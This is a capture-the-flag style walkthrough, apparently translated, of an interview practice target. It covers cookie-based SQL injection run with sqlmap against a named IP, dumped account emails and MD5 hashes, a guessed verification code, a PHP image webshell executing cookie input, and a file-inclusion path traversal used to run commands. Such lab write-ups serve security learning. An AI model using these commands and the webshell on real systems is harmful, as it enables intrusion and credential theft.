Friend interview, sent a practical question, found the same question on the public network, record it here.
Open the question link as follows:
Click on the about page, there are some hints.
It says that directory scanning is required, and dirsearch is used for directory scanning, and some files are discovered.
Access robots.txt to see if there is any sensitive information.
It hints at /1234, but accessing it shows 404.
This website changed robots.txt, and through the robots.txt file of the friend's interview target machine, it is known that the content is Company_admin/login.php, which is the backend of this website.
The backend requires email, password, and a four-digit authentication code. Through simple brute-forcing, it is discovered that the verification code changes every time the page is refreshed, so the method of form brute-forcing is not feasible.
In the about.php page of the interview target machine, there is also a hint of sqli, sqli injection, and obviously there is an SQL injection vulnerability on the page.
Click on the blog on the homepage and find that there is a parameter for id, try if there is an SQL injection.
Here is a hint, "about my password".
Use sqlmap directly for injection exploitation, and find that direct exploitation cannot retrieve content.
Through testing, it is found that the injection point exists in the cookie.
3 and 4.
Run directly with sqlmap.
sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog --tables
There are five tables.
Read table content:
sqlmap -u "http://47.114.90.165:21001/single.php" --cookie "id=6" --level 2 -v 3 -D hs_test_s1_blog -T admin –columns
When running the fields of amdin with sqlmap, it always reports an error, so manual injection is used here.
Get five accounts:
2020-08-08 20:16:55:fakeaddr@gmail.com:e69dc2c09e8da6259422d987ccbe95b5
2021-10-19 01:44:56:123@qq.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 02:53:01:qwe@gmail.com:fcea920f7412b5da7be0cf42b8c93759
2021-10-19 23:41:40:qian@gmail.com:e10adc3949ba59abbe56e057f20f883e
The plaintext of [email protected] is asdqwe123
Now only the four-digit authentication code is left. Since brute-forcing is not possible, there is a hint on the about page, hinting at "some social engineering".
In the blog section of the interview target machine, there are two articles, one of which is a birthday wish to oneself, with a birthday date, 2019-10-27.
Try entering it, and login successfully with 1027.
The login page is as follows:
In the Blog-create post section, there is an upload point, after testing, it is found that this place has a whitelist, which restricts only uploading image format extensions.
See if there is a file inclusion vulnerability, directly include a webshell in the image, and then execute commands.
In the access-language section, there is a parameter that is very familiar, "?template=".
Direct file inclusion can be performed, and the timing, location, and people are ready, prepare the image shell.
Create an image shell, prepare a php file and a png file.
cat 1.php >> 1.png
After testing, the webshell uploaded by this target machine cannot be connected through GET or POST requests, only like SQL injection, it can be connected through the cookie parameter, and then execute commands.
First, prepare the following webshell file.
<?php system($_COOKIE['a']);?>
Then use the method above to create an image shell, and the generated image is as shown in the figure below.
Go back to the place where you create a blog and upload the image shell.
The address is upload/0c3459ff68c1495cefc557f0084a2ac6.png.
File inclusion: http://47.114.90.165:21001/Company_admin/language.php?template=../../upload/0c3459ff68c1495cefc557f0084a2ac6.png.
Capture this packet with Burp, and then execute commands in the cookie section.
Start looking for the flag.
Successfully found the flag.
